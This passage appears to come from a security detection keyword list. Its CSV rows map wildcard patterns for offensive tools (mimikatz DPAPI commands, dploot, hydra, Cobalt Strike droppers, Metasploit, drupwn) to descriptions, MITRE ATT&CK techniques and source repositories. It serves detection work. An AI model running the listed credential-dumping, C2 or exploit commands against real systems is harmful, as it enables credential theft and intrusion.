keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::vault*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::wifi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::wwman*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*dpapi_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*dpapi_pick/credhist.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*DPAPImk2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*dpl4hydra *,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra.sh*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra_*.csv*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra_*.tmp*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dpl4hydra_linksys*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/vanhauser-thc/thc-hydra,1,1,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*dploot -*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,0,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*backupkey*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*browser*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*certificates*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*credentials*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinecertificates*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinecredentials*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z 
-*dploot*machinemasterkeys*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*machinevaults*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*masterkeys*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*vaults*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot*wifi*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot_linux_adm64*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dploot-main.zip*,offensive_tool_keyword,dploot,DPAPI looting remotely in Python,T1003.006 - T1027 - T1110.004,TA0006 - TA0007 - TA0010,N/A,N/A,Credential Access,https://github.com/zblurx/dploot,1,1,N/A,10,3,279,23,2023-09-30T11:10:26Z,2022-05-24T11:05:21Z -*dpplabbmogkhghncfbfdeeokoefdjegm*,greyware_tool_keyword,Proxy SwitchySharp,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 
- TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*dr0op/CrossNet*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*Dr0p1t-Framework*,offensive_tool_keyword,Dr0p1t-Framework,Have you ever heard about trojan droppers ? 
In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .),T1203 - T1005 - T1064,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/D4Vinci/Dr0p1t-Framework,1,1,N/A,N/A,10,1333,402,2018-11-03T19:00:12Z,2017-02-11T21:24:11Z -*dr4k0nia/NixImports*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*DReverseProxy.git*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*DReverseServer.go*,offensive_tool_keyword,cobaltstrike,A tool that can perform reverse proxy 
and cs online without going online,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Daybr4ak/C2ReverseProxy,1,1,N/A,10,10,457,56,2023-04-26T13:16:26Z,2020-01-16T05:43:35Z -*drgreenthumb93/CVE-2022-30190-follina*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/drgreenthumb93/CVE-2022-30190-follina,1,1,N/A,N/A,1,10,4,2023-04-20T20:34:05Z,2022-06-01T11:37:08Z -*DriverQuery.exe no-msft*,offensive_tool_keyword,DriverQuery,Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft,T1124 - T1057 - T1082,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*drk1wi/Modlishka*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. 
It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*droopescan scan drupal -u * -t 32*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Droopscan*,offensive_tool_keyword,Droopscan,A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.,T1190 - T1199 - T1505 - T1210 - T1213,TA0005 - TA0009,N/A,N/A,Web Attacks,https://github.com/droope/droopescan,1,0,N/A,N/A,10,1124,248,2023-06-02T14:21:16Z,2014-10-22T22:06:30Z -*drop_malleable_unknown_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*drop_malleable_with_invalid_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*drop_malleable_without_*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*dropboxC2.py*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dropper_cs.exe*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*dropper32.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate 
the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*dropper64.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*drunkpotato.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*drunkpotato.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*drupal_enum.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*drupwn --mode exploit --target *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Drupwn*,offensive_tool_keyword,Drupwn,Drupal Security Scanner to perform enumerations on Drupal-based web applications.,T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222,TA0001 - TA0002 - TA0009,N/A,N/A,Web Attacks,https://github.com/immunIT/drupwn,1,0,N/A,N/A,6,543,132,2020-11-04T13:43:29Z,2018-04-04T15:13:27Z -*dsquery * -filter *(objectClass=trustedDomain)* -attr *,greyware_tool_keyword,dsquery,enumerate domain trusts with dsquery,T1482 - T1018,TA0007,N/A,APT41 - FIN8,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dswmiexec.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - 
